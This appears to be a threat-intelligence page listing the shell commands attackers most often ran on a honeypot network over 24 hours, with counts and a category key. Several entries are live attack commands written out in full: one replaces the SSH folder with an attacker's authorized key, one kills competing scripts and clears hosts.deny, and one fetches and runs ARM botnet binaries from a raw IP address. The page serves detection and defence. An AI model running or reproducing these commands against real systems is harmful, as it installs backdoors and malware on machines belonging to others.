Executed Commands
Real-time analysis of the most executed commands by attackers after gaining system access. Data collected from our global honeypot network in the last 24 hours.
7,810 commands in 24h
Top Executed Commands
1.
$
cd ~; chattr -ia .ssh; lockr -ia .ssh139 IPs366x
2.
$
lockr -ia .ssh139 IPs366x
3.
$
cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~138 IPs366x
4.
$
cat /proc/cpuinfo | grep name | wc -l126 IPs321x
5.
$
uname -a132 IPs320x
6.
$
df -h | head -n 2 | awk 'FNR == 2 {print $2;}'129 IPs319x
7.
$
cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}'126 IPs318x
8.
$
lscpu | grep Model129 IPs318x
9.
$
uname128 IPs317x
10.
$
top127 IPs316x
11.
$
whoami128 IPs316x
12.
$
ls -lh $(which ls)126 IPs315x
13.
$
free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'126 IPs315x
14.
$
which ls126 IPs315x
15.
$
crontab -l125 IPs313x
16.
$
uname -m126 IPs312x
17.
$
cat /proc/cpuinfo | grep model | grep name | wc -l126 IPs312x
18.
$
w125 IPs310x
19.
$
Enter new UNIX password: 109 IPs210x
20.
$
Enter new UNIX password:109 IPs210x
21.
$
cat /proc/uptime 2 > /dev/null | cut -d. -f131 IPs142x
22.
$
rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep;78 IPs111x
23.
$
export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:$PATH; uname=$(uname -s -v -n -m 2>/dev/null); arch=$(uname -m 2>/dev/null); uptime=$(cat /proc/uptime 2>/dev/null | cut -d. -f1); cpus=$( (nproc || grep -c "^processor" /proc/cpuinfo) 2>/dev/null | head -1); cpu_model=$( (grep -m1 -E "model name|Hardware" /proc/cpuinfo | cut -d: -f2- | sed 's/^ *//;s/ *$//' ; lscpu 2>/dev/null | awk -F: '/Model name/ {gsub(/^ +| +$/,"",$2); print $2; exit}' ; dmidecode -s processor-version45 IPs103x
24.
$
uname -s -v -n -m 2 > /dev/null45 IPs103x
25.
$
uname -s -v -n -r -m21 IPs96x
26.
$
uname -m 2 > /dev/null31 IPs71x
27.
$
/bin/./uname -s -v -n -r -m13 IPs55x
28.
$
echo SCANNER_TEST34 IPs40x
29.
$
cd /data/local/tmp/; rm *; busybox wget http://94.154.35.154/arm.uhavenobotsxd; curl http://94.154.35.154/arm.uhavenobotsxd -O; chmod +x arm.uhavenobotsxd; ./arm.uhavenobotsxd android; busybox wget http://94.154.35.154/arm5.uhavenobotsxd; curl http://94.154.35.154/arm5.uhavenobotsxd -O; chmod +x arm5.uhavenobotsxd; ./arm5.uhavenobotsxd android; busybox wget http://94.154.35.154/arm6.uhavenobotsxd; curl http://94.154.35.154/arm6.uhavenobotsxd -O; chmod +x arm6.uhavenobotsxd; ./arm6.uhavenobotsxd 1 IPs31x
30.
$
shell7 IPs14x
Reconnaissance
Commands to gather system information (uname, whoami, cat /etc/passwd)
Download
Commands to download malware (wget, curl, tftp)
Persistence
Commands to maintain access (crontab, chmod, chattr)
Lateral Movement
Commands to spread across the network (ssh, scp, ping)
About this data
These commands are captured in real-time when attackers gain access to our honeypots. They represent actual techniques used in automated and manual attacks. Use this information to improve your threat detection and incident response.